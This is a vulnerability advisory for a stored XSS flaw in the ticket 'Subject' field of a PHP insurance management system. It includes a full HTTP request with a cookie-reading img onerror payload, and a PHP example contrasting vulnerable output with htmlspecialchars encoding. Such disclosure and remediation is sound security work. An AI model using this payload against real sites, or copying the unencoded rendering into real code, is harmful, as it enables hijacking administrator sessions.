# Exploit Title: Wise-Insurance Agency - Insurance Management System 1.0 - Stored XSS
# Date: 25.08.2025
# Exploit Author: Emir Bulutlu
# Vendor: https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
# Demo Site: http://localhost/E-Insurance/Script/user/?page=generate
# Version: 1.0
# Tested on: macOS
# CVE: N/A

## Within the Insurance Management System, any user can register and subsequently create support tickets. It was observed that the "Subject" field of a support ticket fails to properly sanitize user-supplied input, allowing the injection of malicious JavaScript payloads. This results in a Stored Cross-Site Scripting (XSS) vulnerability.

POST /E-Insurance/Script/user/core/new_ticket HTTP/1.1
Host: localhost
Content-Length: 116
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="139", "Not;A=Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Accept-Language: en-US,en;q=0.9
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/E-Insurance/Script/user/?page=generate
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=qummosnu73pka73ta09dh44bos; __insuarance__logged=1; __insuarance__key=3W08ZLPXIAYGZ840K6BX
Connection: keep-alive

category=4&subject=Test%22%2F%3E%3Cimg+src%3Dx+onerror%3Dconfirm%28document.cookie%29%3E&description=Testv2&submit=1

## Support tickets are displayed on the administrator's dashboard under "Support Tickets." When an administrator views a malicious ticket, the injected script is executed in their browser context.
## Exploitation of this issue could allow an attacker to: Steal administrator session cookies, exfiltrate sensitive information accessible within the admin dashboard, perform unauthorized actions on behalf of the administrator.
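The root cause is that the stored subject is written into the admin dashboard's HTML without output encoding. The following PHP is an added illustration, not code from the affected project: it contrasts that vulnerable rendering pattern with the hardened form, using the decoded `subject` value from the request above as sample input. The function names and the `<td>` markup are assumptions for the example.

```php
<?php
// Added example (not the project's own code). The "Subject" field of a ticket
// is rendered on the admin dashboard; echoing the stored value verbatim is the
// vulnerable pattern, HTML-encoding it at output time neutralises the payload.

// Sample value: the decoded `subject` parameter from the POST body above.
$subject = urldecode('Test%22%2F%3E%3Cimg+src%3Dx+onerror%3Dconfirm%28document.cookie%29%3E');

// Vulnerable pattern (hypothetical rendering helper): the browser parses the
// stored string as markup, so the injected <img> tag and its handler are live.
function render_subject_unsafe(string $subject): string {
    return '<td class="subject">' . $subject . '</td>';
}

// Hardened pattern: encode at the point of output. ENT_QUOTES escapes both
// quote styles (the payload breaks out of an attribute with a double quote),
// and the explicit UTF-8 charset avoids encoding-based bypasses.
function render_subject_safe(string $subject): string {
    $encoded = htmlspecialchars($subject, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<td class="subject">' . $encoded . '</td>';
}

// Quick self-check: the safe output must not contain a raw '<' or '"'.
function is_neutralised(string $html): bool {
    $inner = substr($html, strlen('<td class="subject">'), -strlen('</td>'));
    return strpos($inner, '<') === false && strpos($inner, '"') === false;
}

echo render_subject_unsafe($subject), PHP_EOL;
echo render_subject_safe($subject), PHP_EOL;
echo is_neutralised(render_subject_safe($subject)) ? "encoded OK" : "STILL UNSAFE", PHP_EOL;
```

Output encoding must be applied everywhere the subject is rendered (ticket list, ticket detail, any e-mail template); a server-side length or character allow-list on `subject` and a Content-Security-Policy header on the admin pages are useful defence in depth but not substitutes for it.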